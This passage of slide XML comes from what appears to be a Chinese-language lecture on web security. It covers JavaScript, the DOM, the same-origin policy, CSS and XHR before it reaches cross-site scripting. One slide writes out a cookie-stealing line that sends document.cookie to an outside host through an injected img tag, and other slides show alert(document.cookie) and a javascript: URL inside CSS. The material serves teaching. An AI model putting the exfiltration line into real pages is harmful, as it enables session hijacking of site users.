            <a:off x="4510790" y="1661269"/>
            <a:ext cx="4792233" cy="1519253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="74295" tIns="37148" rIns="74295" bIns="371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056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7584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0112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2640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fn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="180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function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(msg) {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lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="77A09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// ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="180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80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addEventListener(</a:t>
            </a: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'click'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fn, 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false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8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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 381">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1537C13C-2835-49EE-98BF-6677BE57784C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4510789" y="3311609"/>
            <a:ext cx="5249433" cy="223961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zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>内联使用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Inline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338571" lvl="1" indent="-84643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&lt;a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0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onclick=</a:t>
            </a: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"doSomething();"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&gt;&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="D7391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>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>嵌入脚本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Embedded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338571" lvl="1" indent="-84643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&lt;script&gt;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alert(</a:t>
            </a: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'Hello'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>外部脚本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338571" lvl="1" indent="-84643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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="180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src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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"/js/main.js"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327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32373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Document Object Model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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>DOM API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>访问浏览器状态信息和页面内容</a:t>
            </a:r>
            <a:endParaRPr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可通过</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>调用</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0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浏览器状态信息</a:t>
            </a:r>
            <a:endParaRPr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文档、窗口、历史记录、地址、版本</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0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文档</a:t>
            </a:r>
            <a:endParaRPr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属性：链接、表格、锚点</a:t>
            </a:r>
            <a:endParaRPr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方法：增删改其中的元素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  <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>为对象附加事件监听器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39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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3656"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3656"/>
              <a:t> DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Shape 3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window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.location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'http://google.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1625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com/'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1625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.write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'&lt;script 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="..."&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1625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script&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1625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ps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.getElementsByTagName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sz="1625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'p'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1625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es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.getElementById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msg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es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es.firstChild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es.innerHTML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‘&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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href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=“'http://google.com/”&gt;A new link to Google&lt;/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1625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alert(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‘My cookies are: ' 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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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.cookie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194C42-789A-4142-88A2-C655C53B7AE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916884" y="6049962"/>
            <a:ext cx="8137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https://www.w3schools.com/js/js_dom_examples.asp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87812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同源策略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2865783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在页面中动态对象添加</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="731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问题：一个页面可能包含来自多个域名的对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是否允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本访问其它域名的对象呢？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="253929" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="253929" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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3897EF-87CD-430F-ADA2-9151A62256FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1075082" y="2072812"/>
            <a:ext cx="8251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en-US" sz="16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.write(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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'&lt;img src=“http://example.com/?c=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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en-US" sz="16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.cookie + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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'&gt;&lt;/img&gt;'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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140AA1-90C2-406E-9BC0-C75532CF2DFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="4372138"/>
            <a:ext cx="8335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3929" lvl="1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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src=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‘https://code.jquery.com/jquery-2.1.3.min.js’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&gt;&lt;/script&gt;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混源页面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00191" y="2016622"/>
            <a:ext cx="3004094" cy="2498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63" dirty="0"/>
              <a:t>This is my page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1463" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1463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05" y="2588939"/>
            <a:ext cx="2827846" cy="136418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200473" y="2298784"/>
            <a:ext cx="3173895" cy="490826"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40122"/>
              <a:gd name="adj2" fmla="val 134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google.com</a:t>
            </a:r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的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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是否可以读密码？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111027" y="4168605"/>
            <a:ext cx="4088038" cy="692160"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 62290"/>
              <a:gd name="adj2" fmla="val -578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主页面的</a:t>
            </a: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是否可以读</a:t>
            </a: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document.getElementById</a:t>
            </a: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(‘</a:t>
            </a:r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goog</a:t>
            </a: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’).cookie?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390" y="2175648"/>
            <a:ext cx="6528061" cy="2339037"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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&lt;html&gt;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&lt;head&gt;&lt;/head&gt;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&lt;body&gt;</a:t>
            </a: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&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="160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This is my page.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&lt;/p&gt;</a:t>
            </a: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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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var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password =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‘s3cr3t’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="160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&lt;/script&gt;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&lt;iframe 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id=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goog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’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600" dirty="0" err="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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6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‘http://google.com’</a:t>
            </a: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&gt;&lt;/iframe&gt;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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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6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82CB33-51A8-4BA8-BB95-8ABCBE1A620C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500191" y="1581449"/>
            <a:ext cx="2905860" cy="40850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07858" indent="-253929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761787" indent="-253929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15716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269645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95888">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/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zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>在网页中嵌入其它网站，如谷歌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122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9929F7D-08B8-4D6C-A075-F41DD2255DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597249" y="5196332"/>
            <a:ext cx="5206448" cy="1152758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07858" indent="-253929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761787" indent="-253929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15716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269645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886" indent="0" defTabSz="412956">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>假设页面来自源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，其中包含源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>D’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>的脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="423568" indent="-342900" defTabSz="412956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800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>不能访问源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>D’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>的对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="423568" indent="-342900" defTabSz="412956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1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>D’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t> 的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>可以所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>的对象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20063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CSS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861391" y="1417638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body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font-family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sans-serif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5E34F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#content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width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75%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margin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0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auto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b="1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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E34F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#logo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background-image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url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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(//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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img</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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/logo.png)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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E34F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.button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//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...</a:t>
            </a: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endParaRPr sz="1316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p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b="1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span</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5E34F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#icon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316" b="1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background-image</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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316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url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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('</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1316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:...')</a:t>
            </a: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188052">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="145102" algn="l"/>
                <a:tab pos="290205" algn="l"/>
                <a:tab pos="435307" algn="l"/>
                <a:tab pos="580409" algn="l"/>
                <a:tab pos="725511" algn="l"/>
                <a:tab pos="870613" algn="l"/>
                <a:tab pos="1022971" algn="l"/>
                <a:tab pos="1168074" algn="l"/>
                <a:tab pos="1313176" algn="l"/>
                <a:tab pos="1458277" algn="l"/>
                <a:tab pos="1603380" algn="l"/>
                <a:tab pos="1748482" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1316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071441" y="4158215"/>
            <a:ext cx="2669578" cy="715617"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -77491"/>
              <a:gd name="adj2" fmla="val 7316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有些浏览器允许在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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内部使用</a:t>
            </a:r>
            <a:r>
              <a:rPr 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  <a:endParaRPr lang="en-US" sz="1950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" name="Shape 365">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0621534D-9AC2-4DE7-A702-22DDEE985452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="1580322"/>
            <a:ext cx="4522304" cy="241520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07858" indent="-253929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761787" indent="-253929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15716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269645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zh-CN" altLang="en-US" sz="1828">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>内联</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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altLang="zh-CN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span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style=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"display: none;"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&gt;&lt;/span&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1828">
              <a:solidFill>
                <a:srgbClr val="D7391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>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1828">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>嵌入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="338571" lvl="1" indent="-84643" defTabSz="261184">
              <a:spcBef>
                <a:spcPts val="1428"/>
              </a:spcBef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zh-CN" alt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altLang="zh-CN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style&gt;body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{ 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color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1828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: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red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 }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&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1828">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>外部</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" defTabSz="261184"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altLang="zh-CN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link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rel=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"stylesheet"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type=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"text/css"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1828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828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href=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1828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"/css/main.css"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1828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477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656"/>
              <a:t>Web2.0/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3656"/>
              <a:t>XMLHttpRequest (XHR)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Shape 407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394914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  <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>实现异步网络请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>API</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>REST/Ajax</a:t>
            </a:r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浏览器定制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>支持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"/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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>实现，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>典型工作流程</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/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处理客户端事件（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>button click</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>Invoke XHR to server</a:t>
            </a:r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加载服务端数据（</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0"/>
              <a:t>, XML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>, JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>更新</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>DOM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67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XHR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3656"/>
              <a:t>示例</a:t>
            </a:r>
            <a:endParaRPr sz="3656"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702365" y="1447800"/>
            <a:ext cx="9018105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&lt;div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id=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msg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&gt;&lt;/div&gt;</a:t>
            </a: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&lt;form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625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id=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xfer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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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…</a:t>
            </a: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&lt;/form&gt;</a:t>
            </a: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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1625" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327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$(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'#</a:t>
            </a:r>
            <a:r>
              <a:rPr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xfer</a:t>
            </a:r>
            <a:r>
              <a:rPr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).submit(</a:t>
            </a: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function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form_obj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 {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var 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xhr = </a:t>
            </a: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new XMLHttpRequest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();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xhr.open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO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‘POST’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nn-NO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‘/xfer.php’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,</a:t>
            </a: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true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xhr.setRequestHeader(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO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‘Content-type’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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO"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nn-NO" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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‘application/x-www-form-urlencoded’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1625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xhr.onreadystatechange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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6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function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() {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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6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if 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xhr.readyState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== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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4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&amp;&amp; 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xhr.status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== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0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200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 {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		$(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'#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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msg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).html(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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625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	}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};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xhr.send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($(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1625" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6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this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).serialize());</a:t>
            </a:r>
            <a:endParaRPr sz="1625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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1625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});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625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&lt;/script&gt;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3CB1FC-2A6E-4DCE-99D4-1AB11820C97D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781878" y="6317079"/>
            <a:ext cx="646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https://www.w3schools.com/js/js_ajax_intro.asp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806E46-D1E8-4053-A5E7-750025E1C920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702365" y="5636768"/>
            <a:ext cx="7328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问题：如果调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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  <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr</a:t>
            </a:r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.getAllResponseHeaders()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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可否读取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cookie?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000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7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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用架构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客户端攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>跨站脚本攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
